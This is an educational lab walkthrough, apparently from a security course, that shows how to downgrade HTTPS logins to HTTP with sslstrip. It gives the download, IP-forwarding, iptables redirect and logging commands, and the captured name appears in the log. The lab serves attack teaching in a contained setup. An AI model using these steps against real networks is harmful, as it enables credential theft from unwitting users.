Hijacking HTTPS Sessions with SSLstrip (NETLAB)

Use your Kali64 Machine

Open the Kali64 virtual machine. Log in as root with the password toor

Goal

The Attacker will serve as a proxy, converting secure HTTPS sessions to insecure HTTP ones. This will not be obvious to the user.

Using a Secure Login Page

Open IceWeasel and go to attack.samsclass.info

Scroll down to the "Website Attacks and Defense" section, as shown below.

Click the "Secure Login" button.

A page opens, asking you to enter your name, as shown below.

Notice that the URL starts with https -- that means your name will be encrypted.

Type in your name and click the Enter button. A "Vulnerable Message Board" opens.

Downloading SSLstrip

In a Terminal window, execute these commands:
cd

wget http://samsclass.info/sslstrip-0.9.tar.gz

tar xzf sslstrip-0.9.tar.gz

cd sslstrip-0.9

more README

Read through the instructions—that's a quick summary of what we are doing here. When you are done, press Ctrl+Z to close "more".

Starting IP Forwarding

In a Terminal window, execute these commands:
cp /etc/sysctl.conf /etc/sysctl.conf.bak

nano /etc/sysctl.conf

This opens the sysctl.conf file in the pico editor.

Scroll down and find the line that says "#Uncomment the next line to enable packet forwarding for IPv4". Remove the # at the start of the next line, as shown below on this page:

Press Ctrl+X, Y, Enter to save the file.

Setting iptables to redirect HTTP requests

In a Terminal window, execute these commands:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

iptables -t nat -L

You should see one rule in the PREROUTING chain, as shown below on this page:

Check it carefully. If you find any mistake, use this command to delete the rule: iptables -t nat -D PREROUTING 1 and then repeat the commands above to re-create it without the error.

Starting sslstrip

On the Attacker Linux machine, in a Terminal window, type this commands, and then press Enter:
python sslstrip.py -h
A help message appears, showing the options. There aren't many of them.

On the Attacker Linux machine, in a Terminal window, type this command. Then press the Enter key.

python sslstrip.py -l 8080
This starts sslstrip collecting data. It writes the data into a file named sslstrip.log. Leave this Terminal window open.

Starting the Logfile Scanner

On your Attacker machine, open a new Terminal window. Execute these commands:
cd

cd sslstrip-0.9

tail -f sslstrip.log

This command shows the passwords and other data captured by sslstrip. For now, it shows an empty window, as shown below:

Leave this Terminal window open.

Setting the Target Machine to Use a Proxy Server

In a real attack, we would redirect traffic by ARP poisoning. But for this project, we'll just set the proxy within Chrome. That makes the project easier to do, because it won't affect other machines in the lab.

On the Target machine, in IceWeasel, at the top right, click the icon with three horizontal lines.

Click Preferences.

Network tab, click the Settings button.

Select a Proxy of 127.0.0.1, port 8080, as shown below.

Click OK. Click Close.

Using a Secure Login Page

In IceWeasel, return to http://attack.samsclass.info

Scroll down to the "Website Attacks and Defense" section, as shown below.

Click the "Secure Login" button.

A page opens, asking you to enter your name, as shown below.

Notice that the URL starts with http, not https. This is what sslstrip does--the page is no longer secure.

Type in your name and click the Enter button. A "Vulnerable Message Board" opens.

Viewing the Stolen Passsord

In the logfile scanner window, your name should appear, as shown below. Sslstrip stole it!

Credits

I am grateful to Moxie Marlinspike for writing sslstrip and presenting it at Black Hat.

Last revised 5-10-16 by Sam Bowne
Revised 6-16-16 for NETLAB